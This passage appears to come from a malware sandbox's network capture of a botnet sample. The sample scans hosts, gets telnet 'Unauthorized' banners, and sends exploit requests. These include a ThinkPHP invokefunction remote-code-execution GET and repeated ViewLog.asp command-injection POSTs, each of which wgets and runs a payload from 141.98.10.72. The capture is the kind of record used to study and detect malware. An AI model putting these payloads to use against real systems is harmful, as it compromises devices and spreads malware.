                                                            X-Content-Type-Options: nosniff
                                                            Cache-Control: no-cache,no-store
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its
                                                            Feb 14, 2024 09:29:41.430849075 CET156INData Raw: 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61
                                                            Data Ascii: own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            767192.168.2.2355042107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.620690107 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:43Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            768192.168.2.2343568113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.726839066 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:25Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            769192.168.2.2355058107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:42.234704971 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:44Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            770192.168.2.2343596113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:42.466028929 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:26Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            771192.168.2.2355074107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:42.861540079 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:45Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            772192.168.2.234260495.100.121.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:42.976135969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:43.188792944 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:43 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:43 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 39 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 38 33 26 23 34 36 3b 31 37 37 65 65 35 32 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;398e2117&#46;1707899383&#46;177ee527</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            773192.168.2.2343612113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:43.187980890 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:27Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            774192.168.2.2355082107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:43.482423067 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:45Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            775192.168.2.2343622113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:43.923496962 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:27Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            776192.168.2.2355104107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.107511997 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:46Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            777192.168.2.233768462.192.143.578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.485287905 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.695391893 CET135INHTTP/1.1 404 Not Found
                                                            server: owsd
                                                            content-type: text/html
                                                            content-length: 38
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><body><h1>404</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            778192.168.2.234648885.90.247.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.485493898 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.693835974 CET360INHTTP/1.1 405 Not Allowed
                                                            Server: nginx/1.14.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 182
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            779192.168.2.233447085.69.166.1468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.490767956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            780192.168.2.235509862.248.151.928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.510938883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:45.204180002 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:45.424127102 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:29:44 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            781192.168.2.235234695.216.118.938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.510998011 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            782192.168.2.233643231.135.155.2378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.513485909 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            783192.168.2.235695431.41.167.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.514461994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.750356913 CET313INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 106
                                                            Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                            Connection: close
